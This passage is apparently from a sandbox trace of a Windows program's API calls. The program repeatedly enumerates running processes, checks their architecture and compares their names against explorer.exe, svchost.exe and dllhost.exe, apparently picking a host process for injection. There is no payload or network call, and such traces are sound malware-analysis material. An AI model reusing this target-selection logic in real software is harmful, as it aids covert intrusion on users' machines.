th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0251.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0251.236] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.236] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.236] CloseHandle (hObject=0xec) returned 1 [0251.236] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0251.236] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0251.236] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0251.236] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0251.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0251.237] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.237] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.237] CloseHandle (hObject=0xec) returned 1 [0251.237] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0251.237] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0251.237] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0251.237] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0251.238] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0251.238] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0251.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0251.239] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0251.240] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0251.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0251.240] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0251.241] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.241] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.241] CloseHandle (hObject=0xec) returned 1 [0251.241] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0251.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0251.242] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.242] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.242] CloseHandle (hObject=0xec) returned 1 [0251.242] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0251.243] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0251.243] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.243] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.243] CloseHandle (hObject=0xec) returned 1 [0251.243] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0251.243] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0251.244] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.244] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.244] CloseHandle (hObject=0xec) returned 1 [0251.244] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.245] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0251.245] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.245] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.246] CloseHandle (hObject=0xec) returned 1 [0251.246] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0251.246] CloseHandle (hObject=0xe8) returned 1 [0251.246] Sleep (dwMilliseconds=0x3e8) [0252.268] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0252.270] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0252.270] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0252.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0252.271] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0252.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0252.271] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0252.272] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0252.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0252.272] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0252.273] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0252.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0252.273] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0252.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0252.274] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0252.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0252.274] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0252.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0252.275] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0252.275] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0252.276] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0252.276] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0252.277] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0252.277] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0252.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0252.278] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0252.278] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0252.279] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0252.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0252.279] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.279] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.279] CloseHandle (hObject=0xec) returned 1 [0252.279] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0252.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0252.280] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0252.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0252.280] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.280] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.280] CloseHandle (hObject=0xec) returned 1 [0252.280] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0252.281] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0252.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0252.281] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0252.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0252.282] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.282] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.282] CloseHandle (hObject=0xec) returned 1 [0252.282] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0252.282] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0252.282] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0252.282] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0252.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0252.283] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.283] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.283] CloseHandle (hObject=0xec) returned 1 [0252.283] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0252.283] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0252.283] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0252.283] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0252.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0252.283] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.283] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.283] CloseHandle (hObject=0xec) returned 1 [0252.283] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0252.283] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0252.283] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0252.283] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0252.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0252.284] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.284] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.284] CloseHandle (hObject=0xec) returned 1 [0252.284] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0252.284] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0252.284] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0252.284] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0252.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0252.285] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.285] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.285] CloseHandle (hObject=0xec) returned 1 [0252.285] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0252.285] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0252.285] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0252.285] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0252.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0252.285] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.285] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.285] CloseHandle (hObject=0xec) returned 1 [0252.286] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0252.286] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0252.286] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0252.286] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0252.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0252.286] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.286] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.286] CloseHandle (hObject=0xec) returned 1 [0252.286] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0252.286] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0252.286] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0252.286] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0252.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0252.287] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.287] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.287] CloseHandle (hObject=0xec) returned 1 [0252.287] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0252.287] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0252.287] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0252.287] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0252.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0252.287] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.288] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: 